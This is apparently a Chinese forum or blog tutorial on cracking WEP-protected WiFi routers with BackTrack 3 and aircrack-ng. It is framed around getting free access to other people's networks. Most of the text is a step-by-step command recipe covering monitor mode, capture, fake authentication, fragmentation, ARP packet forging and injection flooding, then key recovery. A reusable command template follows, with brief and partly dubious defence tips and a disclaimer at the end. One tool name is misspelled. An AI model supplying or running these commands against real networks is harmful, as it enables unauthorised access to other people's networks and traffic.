最近很多人問(wèn)我怎么破解WiFi密碼…看來(lái)大家都對(duì)免費(fèi)的東西比較有興趣。要么也可能是我太招搖了…囧…
好吧,我就寫(xiě)篇小小的教程,看完后,你應(yīng)該能夠破解大部分無(wú)線(xiàn)路由器密碼了,寫(xiě)這個(gè)教程也是為了加強(qiáng)大家對(duì)無(wú)線(xiàn)網(wǎng)絡(luò)安全性的重視,后面也有簡(jiǎn)單的防破解的辦法。
好了,正式開(kāi)始。
首先,你需要的工具:
軟件:
① BackTrack 3(簡(jiǎn)稱(chēng)BT3)
BT3有光盤(pán)版,硬盤(pán)版還有U盤(pán)版,由于本本基本上可以刻碟,我就懶得弄那些U盤(pán)版,硬盤(pán)版了,直接刻了張碟,所以這篇教程使用光盤(pán)版。
下載地址:
U盤(pán)版:http://backtrack.unixheads.org/bt3final_usb.iso
光盤(pán)版:http://www.remote-exploit.org/cgi-bin/fileget?version=bt3-cd
硬件:
② 一臺(tái)筆記本,或者臺(tái)式機(jī)配無(wú)線(xiàn)網(wǎng)卡。
如果是筆記本,在設(shè)備管理器中查看一下你的網(wǎng)卡類(lèi)型,我的是Intel 3945ABG的,現(xiàn)在市面上大部分筆記本都是用的這個(gè)網(wǎng)卡,所以,這篇教程主要針對(duì)這個(gè)網(wǎng)卡,如果不是,可能也能夠破解成功,我也就沒(méi)有測(cè)試了,臺(tái)式機(jī)用的無(wú)線(xiàn)網(wǎng)卡同理,也有支持BT3的。
圖01-查看網(wǎng)卡
③ 其余瓜子,飲料什么的自備。
關(guān)于前面的準(zhǔn)備部分,網(wǎng)上很多教程都解釋得很詳細(xì)了,我也沒(méi)做過(guò)關(guān)于U盤(pán)版或者硬盤(pán)版,所以這部分跳過(guò)…有問(wèn)題的在下面留言。
插入光盤(pán)開(kāi)機(jī)等待幾分鐘,有個(gè)選擇模式的界面,一般選擇第一個(gè)就會(huì)進(jìn)入BT3的圖形界面,如圖02,如果不能進(jìn)去,輸入賬號(hào)root,密碼toor,然后輸入startx,也可以進(jìn)去,但是我測(cè)試過(guò),我的本本進(jìn)不去,網(wǎng)上找到的答案是顯卡不支持(ATI 2400 XT)
進(jìn)不去第一個(gè)的嘗試選擇第四個(gè)圖形模式,我的可以進(jìn)去,如果這個(gè)也進(jìn)不去,那就每個(gè)圖形模式都試試,都不行的話(huà),那就是RP問(wèn)題了,你的本本顯卡不支持…
圖02-進(jìn)入后界面
然后點(diǎn)右下角的一個(gè)黑黑的顯示器一樣的圖標(biāo)打開(kāi)一個(gè)控制臺(tái),如圖03:
圖03-打開(kāi)控制臺(tái)
這時(shí)候可以開(kāi)始輸入命令了。
① ifconfig -a
這是查看當(dāng)前網(wǎng)卡信息的,-a是顯示全部網(wǎng)卡,如果沒(méi)有這個(gè)參數(shù),就無(wú)法顯示出無(wú)線(xiàn)網(wǎng)卡。這條命令可以查看當(dāng)前網(wǎng)卡的MAC地址,其中,無(wú)線(xiàn)網(wǎng)卡的MAC地址是我們需要的,就在HWaddr后面的6個(gè)16進(jìn)制字符,后面的那么多00是不要的,應(yīng)該是為了IP6做準(zhǔn)備的。如圖04。
圖04-查看網(wǎng)卡信息
為了避免信息泄露,我把我的MAC地址和要破解的AP(Access Point,接入點(diǎn))的MAC地址的后2個(gè)字節(jié)都隱藏了~呵呵~
可以看到,現(xiàn)在的無(wú)線(xiàn)網(wǎng)卡名稱(chēng)是wlan0,這是BT3自動(dòng)加載的iwl3945驅(qū)動(dòng)起的名字,而這個(gè)驅(qū)動(dòng)是不支持之后的破解工作的,所以我們需要換個(gè)驅(qū)動(dòng)。
② modprobe -r iwl3945
卸載當(dāng)前iwl3945驅(qū)動(dòng)。
③ modprobe ipwraw
加載ipwraw驅(qū)動(dòng),這個(gè)驅(qū)動(dòng)是可以正常使用的。
加載之后再輸入ifconfig –a試試,就會(huì)發(fā)現(xiàn)wlan0不見(jiàn)了,出來(lái)了個(gè)wifi0,如圖05,這就是ipwraw給我們的網(wǎng)卡起的名字。這個(gè)名字之后會(huì)多次用到。這時(shí)候也需要把自己的MAC地址記住,最好是在桌面新建一個(gè)文本文件,然后復(fù)制進(jìn)去,方便之后的命令調(diào)用。
圖05-加載3945驅(qū)動(dòng)
④ airomon-ng start wifi0
這條命令是設(shè)置無(wú)線(xiàn)網(wǎng)卡為監(jiān)聽(tīng)模式,因?yàn)閃indows下這個(gè)很難實(shí)現(xiàn),而Linux由于開(kāi)源,所以大部分黑客軟件都是Linux平臺(tái)下的,我剛開(kāi)始用BT3的時(shí)候就因?yàn)閕wl3945驅(qū)動(dòng)不能使用監(jiān)聽(tīng)模式而卡在這里了。設(shè)置成功后,如圖06。
圖06-設(shè)置監(jiān)聽(tīng)模式
⑤ airodump-ng wifi0
既然要破解,那么總得有目標(biāo)吧,這條命令就是檢測(cè)當(dāng)前所能搜索到的所有無(wú)線(xiàn)網(wǎng)絡(luò)信號(hào)。其中包括頻道,信號(hào)強(qiáng)度等信息。運(yùn)行后如圖07。
圖07-查看存在AP
里面的幾個(gè)參數(shù),解釋一下,網(wǎng)上也有解釋的,但是解釋得不太清楚。
BSSID——這個(gè)就是路由器的MAC地址了,我要破解的是下面那個(gè),上面那個(gè)信號(hào)太差。
PWR——這個(gè)是信號(hào)強(qiáng)度,但是我的電腦顯示不出來(lái),顯示不出來(lái)也沒(méi)關(guān)系,不妨礙之后的破解的,只要在Windows中顯示信號(hào)很好就可以了。
Beacons——這個(gè)是路由器對(duì)外發(fā)包,可能是SSID廣播,我也不太清楚,如果看到這個(gè)數(shù)據(jù)在漲,就代表這個(gè)AP還行,一般是1秒漲20~30吧。太慢了就有可能因?yàn)樾盘?hào)的原因破解失敗。
#Data——這個(gè)數(shù)據(jù)最最重要,這個(gè)代表可以用于破解的包,一般這個(gè)數(shù)據(jù)到達(dá)1W+,一般的64位的WEP密碼就能夠破解了。之后我們要做的,就是等待他到達(dá)1W,如果數(shù)據(jù)增長(zhǎng)很緩慢(幾分鐘才增加1),那就只好用另一種方法了,就是發(fā)包攻擊,這個(gè)在后面有介紹。
#/s——DATA增加的速度。
CH——頻道,總共有11個(gè)頻道,可以看到,我要破解的AP的頻道是11。
MB——無(wú)線(xiàn)的速度,現(xiàn)在一般都是54MB的了。
CIPHER——加密方式,如果是WEP,就能夠用這樣的方式破解,如果是WPA/WPA2,目前就只能暴力破解了,話(huà)說(shuō)我現(xiàn)在還不知道怎么暴力破解…等你破解出來(lái)的密碼都是12345,1234567890之類(lèi)的密碼時(shí),你就會(huì)覺(jué)得自己付出的和得到的完全不成比例…TAT。在這里我們只考慮WEP加密的情況。
AUTH——這個(gè)應(yīng)該是authorization的縮寫(xiě),也就是授權(quán)的意思,我也不明白這個(gè)有什么用。可能路由器要給客戶(hù)端發(fā)包,就需要驗(yàn)證客戶(hù)端權(quán)限?,F(xiàn)在這里是空的,之后會(huì)有值的。
ESSID——簡(jiǎn)單理解,這個(gè)就是路由器的名字了。
這一步,我們要做的就是確定需要破解的路由器和它的MAC地址,DATA值增長(zhǎng)速度比較快,或者在Windows下信號(hào)比較好,或者PWR比較高的,優(yōu)先。同樣,可以把MAC地址寫(xiě)到文本文件中去。
⑥ airodump-ng --ivs -w god -c 11 wifi0
這個(gè)命令是檢測(cè)某個(gè)頻道的路由器發(fā)包,并且保存可用包(也就是#DATA)到一個(gè)文件god,這個(gè)god是可以改成你喜歡的名字的,但是自己要記住…
參數(shù)中,
-c是指頻道,后面跟著我要破解的路由器的信號(hào)頻道,也就是11。
wifi0是我的網(wǎng)卡名稱(chēng)。
輸入完這個(gè)命令后,這個(gè)窗口就不用關(guān)了,它要一直抓包的,我們稱(chēng)之為1號(hào)窗口。
這時(shí)候我們重新打開(kāi)一個(gè)控制臺(tái),也就是黑框框。輸入之后的命令:
⑦ aireplay-ng -1 0 -a 00:23:CD:89:**:** -h 00-1F-3C-5B-**-** wifi0
-a后面跟著的是目標(biāo)MAC地址。
-h后面跟著的是本機(jī)的無(wú)線(xiàn)網(wǎng)卡MAC地址。
wifi0是本機(jī)無(wú)線(xiàn)網(wǎng)卡名稱(chēng)
這條命令是獲取授權(quán),測(cè)試模擬發(fā)包攻擊,具體有什么用,我不太清楚… 可能是測(cè)試能否通過(guò)發(fā)包進(jìn)行攻擊吧。
成功后會(huì)出現(xiàn)如下信息:Association successful :-)
然后上面那個(gè)窗口中AUTH欄值變成OPN。
圖08-測(cè)試連接
⑧ aireplay-ng -5 -b 00:23:CD:89:**:** -h 00-1F-3C-5B-**-** wifi0
參數(shù)中
-5是aireplay這個(gè)程序使用的模式,無(wú)需深究。
-b后面跟著的是目標(biāo)MAC地址。
-h后面跟著的是本機(jī)的無(wú)線(xiàn)網(wǎng)卡MAC地址。
wifi0是本機(jī)無(wú)線(xiàn)網(wǎng)卡名稱(chēng)
這個(gè)命令,我的理解是是獲取到一個(gè)特定的包制作攻擊源,然后可以用這個(gè)攻擊源進(jìn)行發(fā)包攻擊。這一步是最難成功的,往往失敗就是因?yàn)檫@一步。如果你選擇的AP等了半天DATA值還是0,可以放棄那個(gè)了。輸入命令后,就開(kāi)始抓包了,下面的數(shù)據(jù)會(huì)漲,如圖09,等抓到一個(gè)有用的包的時(shí)候,它會(huì)問(wèn)你是否用這個(gè)包,如圖10,按Y,然后回車(chē)就OK。
但是往往獲取到的包都是攻擊失敗的,如圖11,這樣就只好繼續(xù)等了,它會(huì)自動(dòng)開(kāi)始下一輪抓包的,所以,破解也是需要RP的…RP低的兄弟姐妹還是飄走吧……
圖09-獲取可用包
圖10-獲取到可用包
圖11-攻擊失敗
再說(shuō)說(shuō)DATA值為什么會(huì)保持在0或者增長(zhǎng)緩慢。如果這個(gè)AP是有客戶(hù)端無(wú)線(xiàn)連接的,那么它發(fā)的數(shù)據(jù)就多,獲取到可用包的幾率就大。如果沒(méi)客戶(hù)端連接,它做的工作就是不斷向外發(fā)送SSID廣播,簡(jiǎn)單說(shuō)就是告訴大家,我是一個(gè)路由器,我的名字是****,我的信號(hào)有多大,我有沒(méi)有密碼等等。這樣的包,可用來(lái)破解密碼的(也就是DATA包)是鳳毛麟角啊,一般5000個(gè)包能出一個(gè)都算不錯(cuò)了…
在等待的過(guò)程中,可以打開(kāi)另一個(gè)窗口,輸入第9條命令
⑨ aircrack-ng -b 00:23:CD:89:**:** god-01.ivs
參數(shù)中
-b后面跟著的是目標(biāo)MAC地址。
這個(gè)就是正式破解了,其中g(shù)od-01.ivs是我們抓的數(shù)據(jù)包,也就是DATA包保存成的文件,如果你多次使用airodump抓包,那么你可以去root目錄看看最新生成的文件名,然后相應(yīng)變更。這個(gè)程序就用這些抓到的DATA包來(lái)計(jì)算出密碼。運(yùn)行命令后如圖12。
圖12-嘗試破解失敗
可以看到破解失敗了。只有34個(gè)IVs(DATA包),不失敗才怪呢,之前說(shuō)過(guò)一般要1W+才可以的。
第2個(gè)窗口中,等啊等,終于等到一個(gè)有用的包了,成功信息如圖13
圖13-獲取到可用于攻擊的包
成功后程序會(huì)生成一個(gè)xor文件fragment-0806-150830.xor,記住這個(gè)就好,下一條命令要用。
接著輸入:
⑩ packetforge-ng -0 -a 00:23:CD:89:**:** -h 00-1F-3C-5B-**-** -k 255.255.255.255 –l 255.255.255.255 -y fragment-0806-150830.xor -w moon
參數(shù)中
-a后面跟著的是目標(biāo)MAC地址。
-h后面跟著本地?zé)o線(xiàn)網(wǎng)卡MAC地址。
-y是上一步中生成的那個(gè)xor文件
-w是生成的ARP包文件名,我填了moon,可更改,也要記住。
這個(gè)命令是偽造ARP包,用于ARP攻擊。
最后一條命令,就讓路由器做臨死前的掙扎吧…
? aireplay-ng -2 -r moon -x 512 wifi0
moon是上一步保存的ARP包文件名。
512是攻擊線(xiàn)程,一般512夠了,1024我怕大了,沒(méi)敢弄。
wifi0是網(wǎng)卡名稱(chēng)。
輸入完這一條,就可以看到第1個(gè)窗口中的DATA值暴增,如圖14。
圖14-發(fā)包攻擊
圖上可以看到,DATA的增長(zhǎng)速度是361個(gè)/s。
然后我們就切換到第3個(gè)窗口,就是aircrack那個(gè)窗口看看吧,等DATA到了5000,就會(huì)自動(dòng)開(kāi)始 破解,如果沒(méi)成功,DATA到達(dá)10000又會(huì)破解一次。這一切都發(fā)生地很迅速。
很快,密碼出來(lái)了,如圖15。
圖15-破解成功
從圖15可以看到,密碼就是8264287788。由于WEP中64位加密是5個(gè)ASCII碼或者10個(gè)16進(jìn)制字符,所以,我們可以切換Windows,然后用8264287788連接上去,如圖16,信號(hào)很好哦!
圖16-無(wú)線(xiàn)連接
【總結(jié)】
把所有用到的命令都總結(jié)一下,[]內(nèi)的是需要更改的,方便大家對(duì)照修改。
① ifconfig –a
② modprobe -r iwl3945
③ modprobe ipwraw
④ airomon-ng start [網(wǎng)卡名]
⑤ airodump-ng [網(wǎng)卡名]
⑥ airodump-ng --ivs -w [DATA包文件名] -c [頻道] [網(wǎng)卡名]
⑦ aireplay-ng -1 0 -a [目標(biāo)MAC] -h [網(wǎng)卡MAC] [網(wǎng)卡名]
⑧ aireplay-ng -5 -b [目標(biāo)MAC] -h [網(wǎng)卡MAC] [網(wǎng)卡名]
⑨ aircrack-ng -b [目標(biāo)MAC] [DATA包文件名]-0*.ivs
⑩ packetforge-ng -0 -a [目標(biāo)MAC] -h [網(wǎng)卡MAC] -k 255.255.255.255 –l 255.255.255.255 -y [上一步的xor文件名] -w [攻擊包文件名]
? aireplay-ng -2 -r [攻擊包文件名] -x [攻擊線(xiàn)程] [網(wǎng)卡名]
在本教程中:
[網(wǎng)卡名] ——wifi0
[DATA包文件名]——god
[頻道]——11
[目標(biāo)MAC]——00:23:CD:89:**:**
[網(wǎng)卡MAC]——00-1F-3C-5B-**-**
[上一步的xor文件名]——fragment-0806-150830.xor
[攻擊包文件名]——moon
[攻擊線(xiàn)程]——512
然后說(shuō)說(shuō)怎么樣防范自己的AP被像我這樣的不速之客破解然后蹭網(wǎng)吧。
① 你可以關(guān)閉SSID廣播,這樣別人就搜索不到你的無(wú)線(xiàn)信號(hào)了。
② 你可以設(shè)置WPA/WPA2加密,現(xiàn)在主流的路由器都支持這個(gè)功能,為什么不用呢?
③ 你可以把你的SSID改成中文,雖然我沒(méi)試過(guò),但是網(wǎng)上貌似說(shuō)這樣就不可以破解了。
④ 你可以設(shè)置MAC地址綁定,但是可以查看合法MAC并偽裝MAC的方式破解(感謝樓下兄弟提供建議~)
至此,教程就結(jié)束了,有什么問(wèn)題,可以跟帖問(wèn)。
我也是個(gè)菜鳥(niǎo),這篇教程也是東拼西湊,再加上自己的一些見(jiàn)解弄出來(lái)的,難免有不對(duì)的地方,歡迎指正~
最后,我和諧地宣布:
本教程旨在普及無(wú)線(xiàn)網(wǎng)絡(luò)知識(shí),加強(qiáng)大家對(duì)無(wú)線(xiàn)網(wǎng)絡(luò)安全問(wèn)題的認(rèn)識(shí),希望大家不要拿來(lái)做壞事哦~用這個(gè)方法造成的一切后果自負(fù),我概不負(fù)責(zé)。嘿嘿~